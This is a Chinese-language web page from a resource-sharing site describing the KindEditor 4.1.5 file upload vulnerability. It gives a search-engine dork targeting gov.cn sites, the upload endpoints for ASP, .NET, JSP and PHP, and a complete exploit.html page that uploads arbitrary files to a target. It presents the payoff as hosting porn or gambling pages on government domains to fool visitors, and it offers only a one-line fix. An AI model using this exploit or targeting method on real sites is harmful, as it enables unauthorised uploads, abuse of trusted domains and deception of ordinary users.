漏洞等级:高危
Kindeditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器。
漏洞描述:
Kindeditor能够上传doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2,wps,pdf格式文件。支持
Java、.NET、PHP、ASP等程序。
漏洞利用:
通过搜索引擎找到目标,比如:搜索关键字 inurl:gov.cn/kindeditor
通过访问http://www.xx.gov.cn/kindeditor/kindeditor.js,查看kindeditor版本是否含有漏洞(<=4.1.5)
获得网站使用的开发语言,并确定kindeditor上传文件地址,各种语言上传地址如下:
-
/asp/upload_json.asp
-
/asp.net/upload_json.ashx
-
/jsp/upload_json.jsp
-
/php/upload_json.php
创建exploit.html页面,编辑内容如下:
<html> <head> <title>kindeditor exploit</title> <script src="http://www.xx.gov.cn/kindeditor/kindeditor.js"></script> <script> KindEditor.ready(function(K) { var uploadbutton = K.uploadbutton({ button : K('#uploadButton')[0], fieldName : 'imgFile', url : 'http://www.xx.gov.cn/kindeditor/asp.net/upload_json.ashx?dir=file', afterUpload : function(data) { if (data.error === 0) { var url = K.formatUrl(data.url, 'absolute'); K('#url').val(url); } }, }); uploadbutton.fileBox.change(function(e) { uploadbutton.submit(); }); }); </script> </head> <body> <div class="upload"> <input type="button" id="uploadButton" value="Upload" /> </div> </body> </html>
浏览器访问页面效果如下:
选择文件test.txt文件(文件内容:test…2019/03/04),网站审核元素,查看返回结果,如图:
访问网址结果如下:
漏洞影响:
由于该漏洞无法上传php,asp,java等类型文件,所以无法getshell,但是可以上传包含色情、赌博等类欺骗性html网页,如果上传到政府类网站,不法分子会利用政府域名的权威性达到欺骗普通用户的目的,所以危害性很大。
解决办法:
限制上传文件类型
1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长!
2. 分享目的仅供大家学习和交流,您必须在下载后24小时内删除!
3. 不得使用于非法商业用途,不得违反国家法律。否则后果自负!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解!
5. 如有链接无法下载、失效或广告,请联系管理员处理!
6. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需!
源码资源库 » 网站渗透富文本编辑器 kindeditor4.1.5 文件上传漏洞_蜘蛛技巧_超级蜘-蛛-池
2. 分享目的仅供大家学习和交流,您必须在下载后24小时内删除!
3. 不得使用于非法商业用途,不得违反国家法律。否则后果自负!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解!
5. 如有链接无法下载、失效或广告,请联系管理员处理!
6. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需!
源码资源库 » 网站渗透富文本编辑器 kindeditor4.1.5 文件上传漏洞_蜘蛛技巧_超级蜘-蛛-池